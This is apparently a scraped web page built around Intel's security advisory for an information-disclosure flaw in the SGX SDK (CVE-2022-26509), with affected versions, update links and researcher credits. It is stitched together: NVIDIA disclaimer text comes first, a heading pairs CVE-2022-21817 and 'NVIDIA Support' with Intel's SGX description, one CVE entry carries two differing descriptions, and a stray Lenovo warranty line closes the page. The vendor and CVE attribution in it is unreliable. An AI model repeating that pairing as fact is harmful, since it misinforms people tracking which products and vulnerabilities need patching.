If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2022-21817: NVIDIA Support

Improper conditions check in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® SGX SDK Advisory**

**Summary: **

Potential security vulnerabilities in the Intel® Software Guard Extensions (SGX) Software Development Kit (SDK) may allow information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-26509

Description: Improper conditions check in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

Description: Insufficient control flow management for the Intel(R) SGX SDK software for Linux before version 2.16.100.1 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N  
 

**Affected Products:**

Intel® SGX SDK software for Linux before version 2.16.100.1.

Intel® SGX SDK software for Windows before version 2.15.100.1.  
 

**Recommendations:**

Intel recommends updating Intel® SGX SDK software for Linux to version 2.16.100.1 or later.

*   Updates are available for download at this location:  
    https://download.01.org/intel-sgx/sgx-linux/

Intel recommends updating Intel® SGX SDK software for Windows to version 2.15.100.1 or later.

*   Updates are available for download at this location:  
    https://registrationcenter.intel.com/en/products/download/3407/  
     

**Acknowledgements:**

Intel would like to thank Jo Van Bulck, Fritz Alder, Frank Piessens, and David Oswald for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Search

lenovo warranty check/lookup | check warranty status | lenovo support us